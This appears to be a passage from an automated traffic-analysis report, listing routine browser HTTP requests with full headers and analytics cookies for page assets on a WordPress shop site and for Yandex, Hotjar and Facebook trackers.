_hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/loader.gif HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/js/base.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/js/flags.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_check HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_check_secondary HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-4@4x-768x768.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=3301862 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://annavirgili.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: AoSPK9UUSSQ6575xtlyULA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=
        Source: global trafficHTTP traffic detected: GET /signals/config/157851312877398?v=2.9.178&r=stable&domain=annavirgili.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-6@4x-768x768.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /?wc-ajax=get_refreshed_fragments HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_start_secondary?redirect_domain=mc.yandex.com&token=10592.KK6lc-btbJ7MZYcs6pbAIRBXvXfoOIBqzm3RnIExwZdHkovESS8E9kEAHeqxlDZg.ak4VJmVMwQVeG9_oCVvnseDajW4%2C HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yandexuid=2276949521734004716; yashr=5720641361734004716
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10592.g3dyK6jIvv6MZmB-MCsSeJEChpTtMBrKrRGwp70-Sq6r46-Rzbn1rbhE77YKH_al.8ekMh-R8AwA9uDTte0sKYiM7Nq0%2C HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yandexuid=2276949521734004716; yashr=5720641361734004716
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/en.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/loader.gif HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-4@4x-768x768.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /?site_id=3301862&gzip=1 HTTP/1.1Host: content.hotjar.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-6@4x-768x768.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-5@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
